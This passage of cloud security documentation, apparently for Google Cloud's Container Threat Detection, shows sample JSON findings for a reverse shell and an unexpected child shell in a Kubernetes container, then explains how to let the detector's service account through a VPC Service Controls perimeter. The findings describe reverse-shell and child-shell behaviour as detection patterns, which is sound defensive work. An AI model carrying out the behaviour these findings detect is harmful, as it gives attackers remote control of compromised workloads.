"DEBIAN_FRONTEND\u003dnoninteractive", "PORT\u003d8080",
"KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
"KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "_\u003d/bin/echo"],
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Process_Binary_Fullpath": "BINARY_PATH",
"Container_Creation_Timestamp": {
"seconds": 1.617989861E9,
"nanos": 0.0
},
"Pod_Name": "POD_NAME",
"Container_Name": "CONTAINER_NAME",
"Process_Arguments": ["BINARY_PATH", "BINARY_NAME"],
"Pid": 15.0,
"Reverse_Shell_Stdin_Redirection_Dst_Port": DESTINATION_PORT,
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Reverse_Shell_Stdin_Redirection_Dst_Ip": "DESTINATION_IP_ADDRESS",
"Pod_Namespace": "default",
"VM_Instance_Name": "INSTANCE_ID",
"Reverse_Shell_Stdin_Redirection_Src_Port": SOURCE_PORT,
"description": "A process started with stream redirection to a remote
connected socket. With a reverse shell, an attacker can communicate from a
compromised workload to an attacker-controlled machine. The attacker can
then command and control the workload to perform desired actions, for
example as part of a botnet.",
"Parent_Pid": 1.0,
"Process_Creation_Timestamp": {
"seconds": 1.61798989E9,
"nanos": 6.16573691E8
}
},
"securityMarks": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
},
"eventTime": "2021-04-09T17:38:10.904Z",
"createTime": "2021-04-09T17:38:15.486Z",
"propertyDataTypes": {
"Container_Image_Id": {
"primitiveDataType": "STRING"
},
"Container_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Pod_Namespace": {
"primitiveDataType": "STRING"
},
"Environment_Variables": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Reverse_Shell_Stdin_Redirection_Dst_Ip": {
"primitiveDataType": "STRING"
},
"description": {
"primitiveDataType": "STRING"
},
"Process_Arguments": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Pid": {
"primitiveDataType": "NUMBER"
},
"Reverse_Shell_Stdin_Redirection_Src_Ip": {
"primitiveDataType": "STRING"
},
"Container_Image_Uri": {
"primitiveDataType": "STRING"
},
"Reverse_Shell_Stdin_Redirection_Dst_Port": {
"primitiveDataType": "NUMBER"
},
"Pod_Name": {
"primitiveDataType": "STRING"
},
"Process_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Reverse_Shell_Stdin_Redirection_Src_Port": {
"primitiveDataType": "NUMBER"
},
"Parent_Pid": {
"primitiveDataType": "NUMBER"
},
"VM_Instance_Name": {
"primitiveDataType": "STRING"
},
"Container_Name": {
"primitiveDataType": "STRING"
},
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
}
},
"severity": "CRITICAL",
"workflowState": "NEW",
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"projectDisplayName": "PROJECT_ID",
"parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parentDisplayName": "PROJECT_ID",
"type": "google.container.Cluster"
}
}
Unexpected Child Shell
{
"finding": {
"access": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
"category": "Unexpected Child Shell",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-06-29T17:34:13.765Z",
"database": {},
"description": "A process should not normally create child shell processes, spawn a child shell process.",
"eventTime": "2023-06-29T17:34:13.492Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"ns": "default",
"name": "CONTAINER_NAME",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
]
},
"mitreAttack": {
"primaryTactic": "EXECUTION",
"primaryTechniques": [
"COMMAND_AND_SCRIPTING_INTERPRETER"
]
},
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/home/vmagent/app/temp/dash\"",
"size": "31376",
"sha256": "31351885b07570f450f57bd19cf28ff4310b8774a1c2580c3c7c9e7336c8467e",
"hashedSize": "31376",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"./temp/dash\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-unexpected-child-shell-3f50de2ab54bac1b\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.52.113.1:443\""
},
{
"name": "\"PYTHONUNBUFFERED\"",
"val": "\"1\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.52.113.1\""
},
{
"name": "\"PATH\"",
"val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"PWD\"",
"val": "\"/home/vmagent/app\""
},
{
"name": "\"LANG\"",
"val": "\"C.UTF-8\""
},
{
"name": "\"SHLVL\"",
"val": "\"1\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"PORT\"",
"val": "\"8080\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.52.113.1\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.52.113.1:443\""
},
{
"name": "\"_\"",
"val": "\"./temp/dash\""
}
],
"pid": "15",
"parentPid": "14"
},
{
"binary": {
"path": "\"/home/vmagent/app/temp/consul\"",
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"./temp/consul\""
],
"argumentsTruncated": false,
"pid": "14",
"parentPid": "13"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"Process_Arguments": [
"./temp/dash"
],
"Pid": 15,
"Process_Creation_Timestamp": {
"seconds": 1688060050,
"nanos": 207040864
},
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Process_Binary_Fullpath": "/home/vmagent/app/temp/dash",
"VM_Instance_Name": "INSTANCE_ID",
"Pod_Name": "POD_NAME",
"Pod_Namespace": "default",
"Container_Name": "CONTAINER_NAME",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Container_Creation_Timestamp": {
"seconds": 1688060050,
"nanos": 0
},
"Parent_Pid": 14,
"Environment_Variables": [
"HOSTNAME=ktd-test-unexpected-child-shell-3f50de2ab54bac1b",
"KUBERNETES_PORT_443_TCP_PORT=443",
"KUBERNETES_PORT=tcp://10.52.113.1:443",
"PYTHONUNBUFFERED=1",
"KUBERNETES_SERVICE_PORT=443",
"KUBERNETES_SERVICE_HOST=10.52.113.1",
"PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"PWD=/home/vmagent/app",
"LANG=C.UTF-8",
"SHLVL=1",
"HOME=/root",
"KUBERNETES_PORT_443_TCP_PROTO=tcp",
"KUBERNETES_SERVICE_PORT_HTTPS=443",
"DEBIAN_FRONTEND=noninteractive",
"PORT=8080",
"KUBERNETES_PORT_443_TCP_ADDR=10.52.113.1",
"KUBERNETES_PORT_443_TCP=tcp://10.52.113.1:443",
"_=./temp/dash"
]
}
}
Scanning projects protected by a service perimeter
If you activated Security Command Center at the organization level after December 7, 2023 and have a service perimeter that blocks access to certain projects and services, you must grant the service account for Container Threat Detection inbound access to that service perimeter. Otherwise, Container Threat Detection can't produce findings related to the protected projects and services.
For organization-level activations, the service account identifier is an email address in the following format:
service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com
In the preceding example, replace ORGANIZATION_ID
with the numerical identifier of your organization.
If your cluster is within a VPC Service Controls service perimeter, make sure that
containerthreatdetection.googleapis.com, the Container Threat Detection API, is listed
as an accessible service.
For more information, see Service perimeter overview.
To grant a service account inbound access to a service perimeter, follow these steps.
Go to VPC Service Controls.
On the toolbar, select your Google Cloud organization.
In the drop-down list, select the access policy that contains the service perimeter you want to grant access to.
The service perimeters associated with the access policy appear in the list.
Click the name of the service perimeter.
Click Edit perimeter
In the navigation menu, click Ingress Policy.
Click Add rule.
Configure the rule as follows:
FROM attributes of the API client
- For Source, select All sources.
- For Identity, select Selected identities.
- In the Add User/Service Account field, click Select.
- Enter the service account email address. If you have both organization-level and project-level service accounts, add both of them.
- Click Save.
TO attributes of GCP services/resources
-
For Project, select All projects.
For Services, select All services or select each of the following individual services that Container Threat Detection requires:
- Kubernetes Engine API
If a service perimeter restricts access to a required service, Container Threat Detection can't produce findings for that service.
In the navigation menu, click Save.
For more information, see Configuring ingress and egress policies.
What's next
Learn more about how Container Threat Detection works.
Learn how to investigate and develop response plans for threats.